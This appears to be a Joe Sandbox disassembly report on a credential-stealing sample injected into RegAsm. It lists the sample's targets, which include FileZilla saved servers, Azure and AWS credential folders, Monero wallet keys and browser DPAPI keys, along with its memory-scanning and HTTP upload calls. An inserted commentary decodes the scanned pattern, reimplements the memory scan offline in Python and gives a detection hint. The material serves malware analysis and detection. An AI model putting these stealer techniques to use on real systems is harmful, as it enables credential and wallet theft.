              • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
              • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
              • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
            • GetUserDefaultLCID.KERNEL32 ref: 004164C6
              • Part of subcall function 004172F0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041733F
              • Part of subcall function 00417380: GetComputerNameA.KERNEL32(?,00000104), ref: 004173CF
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: NameUser__aulldiv$AllocComputerDefaultGlobalInfoMemoryNumaStatusSystemVirtual
            • String ID:
            • API String ID: 3178950686-0
            APIs
            • GetComputerNameA.KERNEL32(?,00000104), ref: 004173CF
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: ComputerName
            • String ID:
            • API String ID: 3545744682-0
            APIs
            • VirtualAllocExNuma.KERNEL32(00000000,?,?,004164BC), ref: 00401132
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: AllocNumaVirtual
            • String ID:
            • API String ID: 4233825816-0
            APIs
            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,004164BC), ref: 004010B3
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: AllocVirtual
            • String ID:
            • API String ID: 4275171209-0
            APIs
            • IsDebuggerPresent.KERNEL32 ref: 0041B562
            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041B577
            • UnhandledExceptionFilter.KERNEL32(0041F298), ref: 0041B582
            • GetCurrentProcess.KERNEL32(C0000409), ref: 0041B59E
            • TerminateProcess.KERNEL32(00000000), ref: 0041B5A5
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
            • String ID:
            • API String ID: 2579439406-0
            APIs
            • SetUnhandledExceptionFilter.KERNEL32(Function_0001C897), ref: 0041C8DE
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: ExceptionFilterUnhandled
            • String ID:
            • API String ID: 3192549508-0
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            APIs
            • strtok_s.MSVCRT ref: 0041015B
            • memset.MSVCRT ref: 0041051D
              • Part of subcall function 00418380: malloc.MSVCRT ref: 00418388
              • Part of subcall function 00418380: strncpy.MSVCRT ref: 004183A3
            • strtok_s.MSVCRT ref: 004104B9
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: strtok_s$mallocmemsetstrncpy
            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
            • API String ID: 2676359353-555421843
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: memset
            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$Z\A$\.IdentityService\$\.aws\$\.azure\$msal.cache
            • API String ID: 2221118986-156850865
            APIs
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
              • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
            • memcpy.MSVCRT(?,00000000,00000000), ref: 00405F16
            • memcpy.MSVCRT(?), ref: 00405F4E
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: ??2@$memcpy$CrackInternet
            • String ID: "$"$------$------$------$XA$XA
            • API String ID: 4271525049-2501203334
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*$18A
            • API String ID: 0-3461493422
            APIs
            • strlen.MSVCRT ref: 004169BF
            • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00416C3A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 004169ED
              • Part of subcall function 00416670: strlen.MSVCRT ref: 00416681
              • Part of subcall function 00416670: strlen.MSVCRT ref: 004166A5
            • VirtualQueryEx.KERNEL32(00416DAD,00000000,?,0000001C), ref: 00416A32
            • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00416C3A), ref: 00416B53
              • Part of subcall function 00416880: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416898
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: strlen$MemoryProcessQueryReadVirtual
            • String ID: :lA$@
            • API String ID: 2950663791-2855229504
            APIs
            • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 00416B7E
            • OpenProcess.KERNEL32(001FFFFF,00000000,00416DAD,004205AD), ref: 00416BBC
            • memset.MSVCRT ref: 00416C0A
            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00416D5E
            Strings
            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00416C2C
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: OpenProcessmemset
            • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
            • API String ID: 1606381396-4138519520
            • Opcode ID: 985516fdb4aba9a37da67002539eb8a614f9f3b36bd237ff0cc46e5de52e8429
            • Instruction ID: 7f38ab3eb3b1a919a3e5ec0c0fab515e305e32cb9f2de8b47bf31e49bfe0b2e9
            • Opcode Fuzzy Hash: 985516fdb4aba9a37da67002539eb8a614f9f3b36bd237ff0cc46e5de52e8429
            • Instruction Fuzzy Hash: 285162B0D002189BDB24EB95DC45BEEB774AF44318F5041AEE50566281EB78AEC8CF5D
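The three entries above (strlen/VirtualQueryEx/ReadProcessMemory, then OpenProcess with access mask 0x1FFFFF, i.e. PROCESS_ALL_ACCESS) describe a cross-process memory scan: the target is opened, its committed regions are read in 0x64000-byte chunks, and each chunk is searched for the hex string listed under Strings. That string is the ASCII text `eyAidHlwIjogIkpXVCIsICJhbGciOiAiRWREU0EiIH0`, which base64-decodes to the JSON Web Token header `{ "typ": "JWT", "alg": "EdDSA" }`. The report does not name the process being scanned, so the example below does not either. It is an added illustration, not code from the report or from the sample: it decodes the pattern and reimplements the chunked scan offline against a constructed byte buffer standing in for a process' address space (the `read` callback and `fake_regions` are stand-ins for ReadProcessMemory and the VirtualQueryEx walk). The one detail worth seeing in code is the overlap handling, because a hit that straddles a 0x64000-byte read boundary is missed by a naive per-chunk search.

```python
"""Added example (not from the Joe Sandbox report or the sample): decode the
scan pattern listed in the report and reproduce the chunked memory search it
implies, offline, against a constructed buffer."""
import base64
import re

# Hex bytes exactly as printed in the report's "Strings" entry.
REPORT_HEX = ("65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 "
              "4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30")
PATTERN = bytes.fromhex(REPORT_HEX.replace(" ", ""))

# ReadProcessMemory in the listing is called with a 0x64000-byte buffer.
CHUNK = 0x64000


def decode_pattern(pattern: bytes = PATTERN) -> str:
    """Base64-decode the ASCII pattern so the analyst can see what is hunted for.
    The listed value is unpadded base64, so padding is restored first."""
    padded = pattern + b"=" * (-len(pattern) % 4)
    return base64.b64decode(padded).decode("ascii")


def scan_region(read, base: int, size: int, pattern: bytes = PATTERN,
                chunk: int = CHUNK) -> list:
    """Walk one region in `chunk`-sized reads and return absolute addresses of
    every occurrence of `pattern`. `read(addr, n)` stands in for
    ReadProcessMemory. The last len(pattern)-1 bytes of each read are carried
    into the next window so a hit straddling a read boundary is still found;
    a full-length match cannot fit inside that carried tail alone, so nothing
    is double counted."""
    hits = []
    tail = b""
    addr, end = base, base + size
    while addr < end:
        n = min(chunk, end - addr)
        buf = read(addr, n)
        window = tail + buf
        window_base = addr - len(tail)
        for m in re.finditer(re.escape(pattern), window):
            hits.append(window_base + m.start())
        keep = len(pattern) - 1
        tail = window[-keep:] if keep else b""
        addr += n
    return hits


def fake_regions() -> list:
    """Constructed stand-in for the VirtualQueryEx region walk: (base, bytes).
    Region A holds one hit well inside a single read; region B places a hit
    across the 0x64000-byte read boundary to exercise the overlap logic."""
    noise = b"\x00" * 1000
    region_a = noise + PATTERN + b".constructed.payload" + noise
    region_b = bytearray(CHUNK + 64)
    off = CHUNK - 10                       # pattern starts 10 bytes before the boundary
    region_b[off:off + len(PATTERN)] = PATTERN
    return [(0x00400000, bytes(region_a)), (0x10000000, bytes(region_b))]


def scan_process(regions, pattern: bytes = PATTERN, chunk: int = CHUNK) -> list:
    """Scan every region, as the sample's loop over VirtualQueryEx results would."""
    hits = []
    for base, mem in regions:
        def read(addr, n, mem=mem, base=base):
            return mem[addr - base:addr - base + n]
        hits.extend(scan_region(read, base, len(mem), pattern, chunk))
    return hits


if __name__ == "__main__":
    print(decode_pattern())
    print([hex(a) for a in scan_process(fake_regions())])
```

On a live host the same behaviour shows up as a process opening another process with GrantedAccess 0x1FFFFF followed by reads (Sysmon Event ID 10 records the access request); a hunting rule keyed on that access mask from an unsigned or freshly dropped binary catches this family of scanner regardless of which string it searches for.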
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: memset
            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
            • API String ID: 2221118986-218353709
            • Opcode ID: 35bd72a9113463a367d23b3699422e00cacb29ac60c05851abf7d94b364ceda1
            • Instruction ID: 953294376e47f8e4316e7e62fd6b04658e6323c3fb6fa537345fd6b82421038a
            • Opcode Fuzzy Hash: 35bd72a9113463a367d23b3699422e00cacb29ac60c05851abf7d94b364ceda1
            • Instruction Fuzzy Hash: 395175B1D5011867CB14EB61DC96FED733CAF50314F4041ADB60A62092EE786BD9CFAA
            APIs
              • Part of subcall function 004062D0: InternetOpenA.WININET(00420DE6,00000001,00000000,00000000,00000000,00420DE3), ref: 00406331
              • Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
              • Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
            • strtok.MSVCRT(00000000,?), ref: 00414E7E
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: Internet$ConnectHttpOpenRequestSendstrtok
            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
            • API String ID: 632984754-1526165396
            • Opcode ID: 403038929566516ced08024de874d387cf2f9a99d356b9ee5bed260c26f508a9
            • Instruction ID: 8f24e6183c5aafacdfff780c7fa5c74c912095ee1ff337cf81358bf1c292c6a0
            • Opcode Fuzzy Hash: 403038929566516ced08024de874d387cf2f9a99d356b9ee5bed260c26f508a9
            • Instruction Fuzzy Hash: D5516130911108ABCB14FF61CC9AEED7738AF50358F50401EF80B665A2DF786B95CB6A
            APIs
            • __lock.LIBCMT ref: 0041AD5A
              • Part of subcall function 0041A97C: __mtinitlocknum.LIBCMT ref: 0041A992
              • Part of subcall function 0041A97C: __amsg_exit.LIBCMT ref: 0041A99E
              • Part of subcall function 0041A97C: EnterCriticalSection.KERNEL32(?,?,?,0041A630,0000000E,0042A090,0000000C,0041A5FA), ref: 0041A9A6
            • DecodePointer.KERNEL32(0042A0D0,00000020,0041AE9D,?,00000001,00000000,?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E), ref: 0041AD96
            • DecodePointer.KERNEL32(?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E,0042A090,0000000C,0041A5FA), ref: 0041ADA7
              • Part of subcall function 0041B7F5: EncodePointer.KERNEL32(00000000,0041BA52,0042BDB8,00000314,00000000,?,?,?,?,?,0041B0C8,0042BDB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041B7F7
            • DecodePointer.KERNEL32(-00000004,?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E,0042A090,0000000C,0041A5FA), ref: 0041ADCD
            • DecodePointer.KERNEL32(?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E,0042A090,0000000C,0041A5FA), ref: 0041ADE0
            • DecodePointer.KERNEL32(?,0041AEBF,000000FF,?,0041A9A3,00000011,?,?,0041A630,0000000E,0042A090,0000000C,0041A5FA), ref: 0041ADEA
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
            • String ID:
            • API String ID: 2005412495-0
            • Opcode ID: cb77c8f26663b753d389b13750b429dfaaa54406b29b0653f19f32e3bf53b593
            • Instruction ID: 6fffd6e3d1db5a9c5a4b6999176ce23e16b6351fdf67b8a2f65ef9f2441ae444
            • Opcode Fuzzy Hash: cb77c8f26663b753d389b13750b429dfaaa54406b29b0653f19f32e3bf53b593
            • Instruction Fuzzy Hash: 663149B09423498FDF109FA9D9442DEBBF1BF48314F14402BD410A6250DBBC48A1CF6A
            APIs
            • __getptd.LIBCMT ref: 0041C3D9
              • Part of subcall function 0041B95F: __getptd_noexit.LIBCMT ref: 0041B962
              • Part of subcall function 0041B95F: __amsg_exit.LIBCMT ref: 0041B96F
            • __amsg_exit.LIBCMT ref: 0041C3F9
            • __lock.LIBCMT ref: 0041C409
            • InterlockedDecrement.KERNEL32(?), ref: 0041C426
            • free.MSVCRT ref: 0041C439
            • InterlockedIncrement.KERNEL32(0042B558), ref: 0041C451
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
            • String ID:
            • API String ID: 634100517-0
            • Opcode ID: 2fdf5c7d4d92f1c4697c24f0328f6c8d5b78f7d6ad19cfbac1087b0e86a654cb
            • Instruction ID: b6f1b0b65aa188883731c215e63f9ee08ae8599addb4a6f87201d1aa76989acc
            • Opcode Fuzzy Hash: 2fdf5c7d4d92f1c4697c24f0328f6c8d5b78f7d6ad19cfbac1087b0e86a654cb
            • Instruction Fuzzy Hash: D3010431A826219BD720AB6A9C857EEB760BB04714F41811BE94463391CB3C68D2CFDE
            APIs
            • __getptd.LIBCMT ref: 0041C13D
              • Part of subcall function 0041B95F: __getptd_noexit.LIBCMT ref: 0041B962
              • Part of subcall function 0041B95F: __amsg_exit.LIBCMT ref: 0041B96F
            • __getptd.LIBCMT ref: 0041C154
            • __amsg_exit.LIBCMT ref: 0041C162
            • __lock.LIBCMT ref: 0041C172
            • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C186
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
            • String ID:
            • API String ID: 938513278-0
            • Opcode ID: da157f3430a2bf975af02803655c68f1a585ca0f4a593862dc9274f96ca4ab26
            • Instruction ID: 9fc434d286289e419f3aa4a208740ff26eea7a26fa5dacee767cec1b97643960
            • Opcode Fuzzy Hash: da157f3430a2bf975af02803655c68f1a585ca0f4a593862dc9274f96ca4ab26
            • Instruction Fuzzy Hash: 4AF06271AD5310ABD720BBA95C427DA3790AF00728F15410FE454A62D3CB6C58D19A9E
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: __aulldiv
            • String ID: %d MB$@
            • API String ID: 3732870572-3474575989
            • Opcode ID: a22fd26a20c89c12fe6cfaaf614cf5a2958407047c3d7a896a6bd652d51aa950
            • Instruction ID: f6ead53c39b4582a22ff827f4f83d0c2aee1884270de42e44796eba59a74ffdb
            • Opcode Fuzzy Hash: a22fd26a20c89c12fe6cfaaf614cf5a2958407047c3d7a896a6bd652d51aa950
            • Instruction Fuzzy Hash: AD218CF1E44218ABDB10DFD8CC49FAEB7B9FB08B14F104509F605BB280D77869018BA9
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: memcmpmemset
            • String ID: @$v10
            • API String ID: 1065087418-24753345
            • Opcode ID: 8900047ccc3a7ea6eca2ef2dfc1eae2581b6e08053fcaf9ffe0f5684236083b7
            • Instruction ID: 07f8737455eafbd8f61b9e4d9b284130f9ce7af93f488edb76ba3c8551e2a7c8
            • Opcode Fuzzy Hash: 8900047ccc3a7ea6eca2ef2dfc1eae2581b6e08053fcaf9ffe0f5684236083b7
            • Instruction Fuzzy Hash: 23414870A0020CEBCB04DFA4CC99BEE77B5BF44304F108029F905AB295DBB8AD45CB99
            APIs
            • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409DE2
              • Part of subcall function 00409BB0: memcpy.MSVCRT(?,?,?), ref: 00409C16
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: memcmpmemcpy
            • String ID: $"encrypted_key":"$DPAPI
            • API String ID: 1784268899-738592651
            • Opcode ID: 740c6884d9f561bb7ce577100f1b7d1c7d71afeb4ed27ad6aba31cad7ccdc5b7
            • Instruction ID: 7f392d33d6ad21de2d61bb21213a98381b23072c845d074b64d64ac31095145a
            • Opcode Fuzzy Hash: 740c6884d9f561bb7ce577100f1b7d1c7d71afeb4ed27ad6aba31cad7ccdc5b7
            • Instruction Fuzzy Hash: 7A3150B5D00108ABCB04DBE4DC45AEF77B8AF48304F44856AE915B3282E7789E44CBA5
            APIs
            • memset.MSVCRT ref: 00407354
            • task.LIBCPMTD ref: 00407595
              • Part of subcall function 00409290: vsprintf_s.MSVCRT ref: 004092AB
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2148744358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: memsettaskvsprintf_s
            • String ID: Password
            • API String ID: 2675463923-3434357891
            • Opcode ID: e183b5279ab9e6df2eb167b03a4cc02d75207c5ff0d2bc4bafbb891a8174e7a2
            • Instruction ID: 975b1f2fff90f96d03099a1470760af69fc6b50b1064dc5ad3510b71ddc5061f
            • Opcode Fuzzy Hash: e183b5279ab9e6df2eb167b03a4cc02d75207c5ff0d2bc4bafbb891a8174e7a2
            • Instruction Fuzzy Hash: 52613DB5D041689BDB24DF50CC41BDAB7B8BF48304F0081EAE689A6181DFB46BC9CF95